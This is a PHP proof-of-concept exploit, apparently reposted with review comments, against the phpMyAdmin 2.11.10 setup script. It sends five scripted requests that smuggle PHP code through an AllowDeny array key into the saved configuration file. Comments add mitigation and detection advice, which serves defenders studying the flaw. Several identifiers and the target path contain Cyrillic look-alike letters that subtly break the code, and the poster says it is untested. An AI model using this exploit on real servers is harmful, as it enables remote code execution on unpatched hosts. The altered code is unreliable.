<?php
// Proof-of-concept, as posted, against the setup script of phpMyAdmin 2.11.10.
// It walks the setup wizard through five requests: fetch the form, add a server,
// store the server entry in the session, save the configuration to a file, and
// load that file back.
//
// Defender's reading:
// - The only unusual input is the AllowDeny[...] parameter in request 3: its
//   innermost array key carries PHP source text instead of a plain key name.
// - NOTE(review): presumably the setup script writes that key unescaped into the
//   saved configuration file, so loading the file evaluates it; confirm against
//   the vendor advisory for the installed release.
// - Mitigation: remove or block web access to the setup script once installation
//   is finished, keep the configuration directory non-writable by the web server,
//   and run a fixed release.
// - Detection: POSTs to the setup script with action=save followed by action=load,
//   and request parameter names that contain quotes, dots or parentheses.
$target_url = "http://web/phpmyadmin/sсriрts/setup.php";
// Form token; get_response() overwrites it after every response.
$token = null;
// request 1: plain GET (default arguments), used only to obtain the first token
$res = get_response();
// request 2 (add server)
$res = get_response('POST', "token=$token&action=addserver");
// request 3 (save to session): ordinary server fields plus the AllowDeny key described above
$res = get_response('POST', "token=$token&action=addserver_real&host=localhost&connect_type=tcp&extension=mysql&auth_type=config&user=root&password=1&submit_save=Add&AllowDeny_order=1&AllowDeny[a][b]['.phpinfo().']=1");
// request 4 (save to file)
$res = get_response('POST', "token=$token&action=save");
// request 5 (load file)
$res = get_response('POST', "token=$token&action=load");
// Print the body of the last response.
var_dump($res);
/**
 * Send one request to $target_url and refresh the global form token.
 *
 * @param string      $method 'GET' (default) or 'POST'.
 * @param string|null $bоdу   URL-encoded POST body; only used when $method is 'POST'.
 * @return mixed Whatever curl_exec() returned: the response body as a string, or
 *               false on failure (no error check is made here).
 */
function get_response($method='GET', $bоdу=null) {
global $target_url, $token;
// One cURL handle is created on the first call and reused for every later call.
static $ch = null;
if ($ch === null) $ch = curl_init();
// Return the response body as a string instead of printing it.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $target_url);
if ($method == 'POST') {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $bоdу);
}
// NOTE(review): option names and path are kept exactly as posted; presumably meant
// to keep the session cookie in a file under /tmp between requests - confirm.
curl_setopt($ch, CURLOPT_cооkieFILE, '/tmp/cооkie.txt');
curl_setopt($ch, CURLOPT_cооkieJAR, '/tmp/cооkie.txt');
$res = curl_exec($ch);
// The token is scraped from the page that was just served, so on the server side it
// acts as an anti-forgery value only; it does not restrict who may submit the form.
$token = get_token($res);
return $res;
}
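/**
 * Extract the value of the hidden "token" form field from an HTML response.
 *
 * @param string $s Response body to search.
 * @return string|null The first token value found, or null when the markup
 *                     contains no name="token" value="..." pair.
 */
function get_token($s) {
    // Non-greedy capture: stop at the first closing quote after value=".
    $found = preg_match('#name="token" value="(.*?)"#', $s, $m);
    // preg_match() yields 1 on a match, 0 on no match and false on error;
    // only a real match has a capture group to hand back.
    return $found === 1 ? $m[1] : null;
}
// Poster's remark (translated from Russian): searched for this for a long time, found it, have not tested whether it works.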